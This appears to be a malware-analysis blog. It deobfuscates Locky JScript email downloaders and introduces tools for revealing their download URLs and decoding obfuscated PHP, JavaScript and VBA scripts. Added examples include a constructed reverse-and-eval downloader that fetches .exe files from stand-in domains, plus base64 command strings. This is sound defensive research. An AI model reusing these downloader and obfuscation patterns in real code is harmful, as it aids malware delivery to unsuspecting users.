Locky JS and URL Revealer

From various reports, it appears that the malicious JavaScript files sent via email that pull Locky down are back.

Let’s see what these scripts look like:

2016-06-22_01

At the bottom of the script is this function, which reverses the string above, joins the characters, then evaluates the result:

eval(aBN3DmdER7P.split('').reverse().join(''));

Since we're dealing with JScript, we can swap eval for WScript.Echo and capture the result instead of executing it:

WScript.Echo(aBN3DmdER7P.split('').reverse().join(''));

Now we get this:

2016-06-22_02

This script employs a lot of nonsense functions that just return exactly what gets passed to them, in an attempt to make it harder to figure out what's going on.

After I beautify the script and scan through everything, I come across the main function that downloads a file from the Internet. It’s using the familiar AJAX method.

2016-06-22_03

I echo out the URL array to see where the requests are going. There are three URLs it attempts to connect to. If a site is up, Locky gets downloaded and executed.

2016-06-22_04
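The three manual steps above (un-reverse the eval'd string, ignore the pass-through functions, read the URL array) can be done statically without ever running the script. The following is an added example of my own in JavaScript for Node.js, not code from the post or from the malware. The sample it works on is constructed to mirror the pattern described (variable name from the post, pass-through functions q1/q2, reserved test domains); it is not a real Locky script. The unwrapper assumes the reversed string literal contains no escaped quotes, and the call stripper does not look inside string literals.

```javascript
// Added example: static unwrapping of a reverse-and-eval JScript downloader.
// PLAIN_PAYLOAD is CONSTRUCTED for this demo; it is not a real Locky script.
const PLAIN_PAYLOAD =
  'function q1(a){return a;}function q2(b){return b;}' +
  'var u=[q1("http://example.invalid/a.exe"),q2(q1("http://example.test/b.exe"))];' +
  'var x=new ActiveXObject(q1("MSXML2.XMLHTTP"));x.open(q2("GET"),u[0],false);';

// Obfuscate it the way the script in the post is: store the payload reversed,
// then eval(name.split('').reverse().join('')).
const SAMPLE =
  "var aBN3DmdER7P='" + PLAIN_PAYLOAD.split('').reverse().join('') + "';" +
  "eval(aBN3DmdER7P.split('').reverse().join(''));";

// Step 1: locate `var NAME = '...'; ... eval(NAME.split('').reverse().join(''))`
// and return the un-reversed payload instead of executing it.
// Assumption: the string literal contains no escaped quotes.
function unwrapReversedEval(src) {
  const re = /var\s+(\w+)\s*=\s*(['"])([\s\S]*?)\2\s*;[\s\S]*?eval\(\s*\1\.split\((['"])\4\)\.reverse\(\)\.join\((['"])\5\)\s*\)/;
  const m = re.exec(src);
  if (!m) return null;
  return m[3].split('').reverse().join('');
}

// Step 2: remove "nonsense" identity functions, function f(a){return a;}, and
// unwrap every call to them so that f(expr) becomes expr (nested calls too).
function stripIdentityFunctions(code) {
  const defRe = /function\s+(\w+)\s*\(\s*(\w+)\s*\)\s*\{\s*return\s+\2\s*;?\s*\}/g;
  const names = [];
  let out = code.replace(defRe, (_, name) => { names.push(name); return ''; });
  for (const name of names) out = unwrapCalls(out, name);
  return out;
}

function unwrapCalls(code, name) {
  const callRe = new RegExp('\\b' + name + '\\s*\\(', 'g');
  let out = code;
  let m;
  while ((m = callRe.exec(out)) !== null) {
    const open = m.index + m[0].length - 1;   // index of the opening parenthesis
    let depth = 0;
    let i = open;
    for (; i < out.length; i++) {             // find the matching closing parenthesis
      if (out[i] === '(') depth++;
      else if (out[i] === ')' && --depth === 0) break;
    }
    if (i >= out.length) break;               // unbalanced parentheses: give up on this name
    out = out.slice(0, m.index) + out.slice(open + 1, i) + out.slice(i + 1);
    callRe.lastIndex = 0;                     // the text changed, rescan from the start
  }
  return out;
}

// Step 3: pull out every URL so the network indicators can be acted on.
function extractUrls(code) {
  return Array.from(new Set(code.match(/https?:\/\/[^\s'"<>)]+/g) || []));
}

function analyze(src) {
  const payload = unwrapReversedEval(src);
  if (payload === null) return { payload: null, cleaned: null, urls: [] };
  const cleaned = stripIdentityFunctions(payload);
  return { payload, cleaned, urls: extractUrls(cleaned) };
}

const report = analyze(SAMPLE);
console.log(report.cleaned);
console.log(report.urls);
```

Running it prints the cleaned downloader with the pass-through calls gone and the two URLs from the array; real samples usually need the payload beautified first, but the three steps are the same.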

This round of scripts is similar to the ones sent before the Locky gang took a break. If you've been tracking their scripts, you know that they make a lot of changes to bypass filters, but they are essentially all AJAX downloaders.

Instead of trying to keep up with their constant script variations, I thought, why not use a web proxy? You just run the script in a VM and catch the URLs being called. There's Fiddler, Paros, Burp, etc. I could use, but I thought I would try to make something more lightweight and portable.

URL Revealer
Here's my take on a web proxy. This program captures the request from these scripts and drops it, so the malware is never downloaded from the Internet. This way you can see the URLs and take the necessary action quickly, without having to deobfuscate the script.

When you run URL Revealer (in a VM!), it automatically sets up a proxy server on port 8080 and writes the captured URLs to a text file in the app path. Open your browser and test it to make sure it's working properly before executing the script you want to analyze. You should also set your VM's network adapter to "host-only" while doing this, just to be safe.

Here’s what it looks like when I run four recent Locky scripts plus two from the past two weeks:

2016-06-22_05

I killed the wscript process in between runs; otherwise the script would just keep going. URL Revealer ignores repeated hits to the same URL as long as it is exactly the same as the one before.

When you are done, press Enter to quit so that URL Revealer can disable the proxy server. If you forget, just run URL Revealer again and hit Enter a couple of times until it quits.

If you run the program from an elevated command line, you can change the proxy port as well as the capture filename.

2016-06-22_06

Over the past several months, I saw four methods used by various scripts to download malware from the Internet: AJAX, WinHTTP, bitsadmin, and PowerShell. URL Revealer should detect and block the requests for all of these methods. If you encounter a new method, please let me know.

You can get the program here.


Script Deobfuscator Updated

Continuing from my last blog post, I updated the program to handle the latest obfuscated JavaScript technique. I made the logic generic in order to handle future versions and variants, so the results may come out a bit weird (e.g. stray tick marks). But the main thing is that you'll be able to see what these scripts are doing.

I broke out the concatenation option by script type, so the results should be somewhat better than before.

2016-02-22_01

2016-02-22_02

2016-02-22_03

I hope this works for most of the scripts you encounter. And thank you for your continued support!


Deobfuscating a Hideous-Looking JS Downloader

One of my readers, Stefano from zanna.it (thanks!), sent me this little gem:

2016-02-21_01

In the midst of seemingly random strings, there are clues to its structure but there’s very little to go on. I started off by grabbing a portion of the script and having it show me what the variable contains.

2016-02-21_02

The string of gibberish is lined up in an array, but only the last value is collected. Here, you can see the individual characters that make up the call to the URL.

2016-02-21_03

I found another script that employs the same method. In this version, the values outside of the parenthesized elements are collected. The first section spells out "ActiveXObject".

2016-02-21_04

Here's yet another script that uses the same method and then takes it up another level. The first section also spells out "ActiveXObject", but this time it makes use of an interesting behavior where the first character of the string attached to the ".e()" property is collected. Note: you need to unescape the script to convert the decimal values to single characters.

2016-02-21_05

Writing a program to extract the correct value is a little tricky but doable. I’ll need to test this further before releasing the program but it seems to work.

Example #1

2016-02-21_06

Example #2

2016-02-21_07

Example #3…for this one, I had to unescape the script first.

2016-02-21_08

Each of these three example scripts downloads an executable, saves it to the temp folder, then executes it.


Script Deobfuscator Released

The purpose of this tool is to help you perform static analysis on obfuscated scripts. It’s often easier to dynamically analyze scripts but there are times when you just don’t know where to start or you just want a high-level view of what’s going on with the script. This tool may be able to help you.

I already wrote a tool called PHP Script Decoder, but this new version has been re-written in .NET with new functionality and the flexibility to handle PHP, JavaScript, VBA, and VBS scripts.

To explain how to use this tool, let me show you how to tackle seven different obfuscated scripts.

Example #1 (unphp)

Here’s what the script looks like. Looking at the script, you’ll see an array of base64-encoded strings at the top. Following that are references to specific elements from the array.

2016-02-15_01

Paste in the script sections like so. The script you are trying to deobfuscate goes at the top, and the array of base64-encoded strings separated by commas goes in the middle section. I enter the search string "_705650624(#)" since that's how the script at the top references the elements from the array (note: the pound sign is a wildcard and must be present). I select the "Array" method and click the "Convert" button.

2016-02-15_02

The results still show encoded strings so now I check the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options and try again.

2016-02-15_03

The script has been deobfuscated and is much easier to read. The script won't execute though, because the strings are quoted (or unquoted) incorrectly.

Example #2 (ddecode)

Here’s the script we’ll be working on:

2016-02-15_04

First we need to unescape it so click on the “Unescape” button. If you right-click on the Output box, there’s an option to save the results to a text file. (You can right-click on the Input box and read in a file too.)

2016-02-15_05

Click on "Copy Output to Input" to move the result to the top. This script uses randomized variable names and assigns a value to each. The later portion references those values.

The tool will parse the script and load each variable and associated value into an array. It then does a search for the variable and replaces it with the value.

Choose the "Random Vars 1" method. The delimiter for this script is a semicolon, and for the search string I enter ${"GLOBALS"}["#"]="*"; The pound sign is a placeholder for the variable name and the asterisk is the placeholder for the value.

Here’s the result:

2016-02-15_06

Example #3 (unphp)

This script also uses random variable names but in this version, the strings are base64-encoded. The top portion defines the global variables while the lower section, beginning at “session_start()”, references them.

2016-02-15_07

Paste the script sections in the tool as follows then choose the “Random Vars 2” method and the “Base64 Decode” and “Keep Quotes” options. Note the search string has spaces in between so that it matches the script at the top.

2016-02-15_08

Example #4 (unphp)

Here’s what the script looks like (I highlighted the key):

2016-02-15_09

This script references an element in an array to build the values for its variables. The elements are based on the character position in the key.

The first step is to paste the entire script in the Input box and choose the key lookup option. I use $f9[#] as the search string. In the Lookup Key box, paste the key and remove the starting and ending quotes. Also make sure the key you paste in has been properly escaped. You can see there's concatenation going on, so check the "Concatenate" option.

2016-02-15_10

Example #5 (ddecode)

In this example, we’re just interested in decoding the base64 strings.

2016-02-15_11

Copy the entire script to the Input box, then choose the "Base64" method as well as the "Base64 Decode", "Concatenate", and "Keep Quotes" options. Make sure the delimiter and search string match those of the script.

2016-02-15_12

Example #6 (pastebin)

This script uses a Joomla exploit and contains decimal values, making it tough to see immediately what it does.

2016-02-15_13

Paste the script into the Input box and choose the “ASCII” method.

2016-02-15_14

Almost, but it's not concatenated. If you choose the "Concatenate" option, it won't clean up everything. In the "Output Options" section, there's a "Remove Chars" box. Enter a period and try again.

2016-02-15_15

Example #7 (pastebin)

This last example is a VBA script. It does a simple math calculation, then the result is converted to its ASCII character equivalent.

2016-02-15_16

Paste the script in and choose the “Math” method.

2016-02-15_17

The result shows decimal values but not the text equivalent. 🙁 So enter "chr(" into the "Pre Str" box and a closing parenthesis in the "Post Str" box.

2016-02-15_18

Look familiar? Now we can use the “ASCII” method to get the characters. I also entered an ampersand and space character in the “Remove Chars” box.

2016-02-15_19

The resulting deobfuscated script will probably error out if you try executing it. Again, all this tool will do is try to make the script readable so you can better understand it. You may need to use this tool on parts of the script then put them back together yourself to figure things out.
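The methods walked through above are each a small, mechanical text transformation, which is what makes them reusable across script families. As an added example of my own (not the Script Deobfuscator's code), here are the "Array" method with base64 decoding and "Keep Quotes" (Example #1), the key-position lookup with concatenation (Example #4), and the "Math" plus "ASCII" steps with the & operator (Example #7), written as plain functions in JavaScript for Node.js. The three sample scripts, the key, and the array contents are constructed for illustration and are not the scripts from the screenshots; only the search-string syntax (_705650624(#), $f9[#]) is taken from the post. The concatenation step handles double-quoted strings only, and the math evaluator accepts nothing but integers joined by + - *.

```javascript
// Added example: the Array, Key Lookup, Concatenate, Math and ASCII steps as
// functions. Sample inputs are CONSTRUCTED and are not the post's real scripts.

// Turn a search string with "#" as the index wildcard (e.g. "_705650624(#)" or
// "$f9[#]") into a global regex with one capture group for the index.
function indexPattern(search) {
  const escaped = search.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  return new RegExp(escaped.replace('#', '(\\d+)'), 'g');
}

// "Array" method: replace every reference to element N with the array value,
// optionally base64-decoding it and putting it back in quotes.
function resolveArrayRefs(script, elements, search, opts = {}) {
  return script.replace(indexPattern(search), (whole, idx) => {
    let value = elements[Number(idx)];
    if (value === undefined) return whole;                   // out of range: leave the reference alone
    if (opts.base64) value = Buffer.from(value, 'base64').toString('latin1');
    return opts.keepQuotes ? `"${value}"` : value;
  });
}

// "Key Lookup" method: $f9[N] means "character N of the key".
function resolveKeyLookup(script, key, search) {
  return script.replace(indexPattern(search), (whole, idx) => {
    const ch = key[Number(idx)];
    return ch === undefined ? whole : `"${ch}"`;
  });
}

// "Concatenate": fold "a" . "b" (PHP) or "a" & "b" (VBA) into "ab" until
// nothing changes. Double-quoted strings only.
function concatenate(script, operator) {
  const op = operator.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  const re = new RegExp(`"([^"]*)"\\s*${op}\\s*"([^"]*)"`, 'g');
  let prev;
  do {
    prev = script;
    script = script.replace(re, (_, a, b) => `"${a}${b}"`);
  } while (script !== prev);
  return script;
}

// Evaluate an integer expression built only from + - * without eval;
// anything else is refused and returns null.
function evalSimpleMath(expr) {
  const clean = expr.replace(/\s+/g, '');
  if (!/^\d+(?:[+\-*]\d+)*$/.test(clean)) return null;
  return clean.split(/(?=[+-])/).reduce((total, term) => {   // split into signed terms
    const sign = term.startsWith('-') ? -1 : 1;
    const product = term.replace(/^[+-]/, '').split('*').map(Number).reduce((a, b) => a * b, 1);
    return total + sign * product;
  }, 0);
}

// "Math" + "ASCII" methods in one step: Chr(70 + 2) -> "H".
function resolveChr(script) {
  return script.replace(/Chr\(([\d\s+\-*]+)\)/gi, (whole, expr) => {
    const code = evalSimpleMath(expr);
    return code === null ? whole : `"${String.fromCharCode(code)}"`;
  });
}

// Constructed sample 1: PHP, base64 array referenced through a wrapper function.
const PHP_ARRAY_ELEMENTS = ['c3lzdGVt', 'd2hvYW1p', 'ZXhlYw=='];   // system, whoami, exec
const PHP_ARRAY_SCRIPT = '$f = _705650624(0); $f(_705650624(1));';

// Constructed sample 2: PHP, characters picked out of a key by position.
const PHP_KEY = '0eslyamt';
const PHP_KEY_SCRIPT = '$v = $f9[2].$f9[4].$f9[2].$f9[7].$f9[1].$f9[6];';

// Constructed sample 3: VBA, Chr() of small sums joined with &.
const VBA_SCRIPT = 's = Chr(70 + 2) & Chr(110 - 5) & Chr(30 + 3)';

function demo() {
  return {
    array: resolveArrayRefs(PHP_ARRAY_SCRIPT, PHP_ARRAY_ELEMENTS, '_705650624(#)', { base64: true, keepQuotes: true }),
    key: concatenate(resolveKeyLookup(PHP_KEY_SCRIPT, PHP_KEY, '$f9[#]'), '.'),
    vba: concatenate(resolveChr(VBA_SCRIPT), '&'),
  };
}

console.log(demo());
```

As with the tool, the output is meant to be read, not run: quoting is restored only where the transformation put it, and anything the functions do not recognise is left untouched so you can see where to look next.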

I tried to make the functions in this tool flexible and generic enough to handle whatever scripts come your way. However, if you encounter something new, please let me know. You can get the tool here.

Happy reversing!


Packing/Unpacking Javascript from DOS

Here's one way to pack and unpack JavaScript from the Windows command line. For this we use PhantomJS and Dean Edwards' JavaScript Compressor.

1. Download PhantomJS from here.

2. Download the JSPacker.js file from here.

3. Put everything in a folder or on your desktop, then in DOS type the following:

C:\> phantomjs jspacker.js pack in.txt out.txt

-or-

C:\> phantomjs jspacker.js unpack in.txt out.txt

2016-02-06_01
